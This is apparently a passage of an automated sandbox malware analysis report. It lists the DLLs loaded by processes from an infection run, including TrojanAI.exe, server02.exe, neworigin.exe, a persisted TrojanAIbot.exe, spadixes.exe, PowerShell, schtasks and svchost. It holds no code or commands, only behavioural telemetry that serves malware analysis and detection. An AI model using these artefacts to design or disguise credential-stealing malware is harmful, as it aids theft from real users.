Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sppc.dll
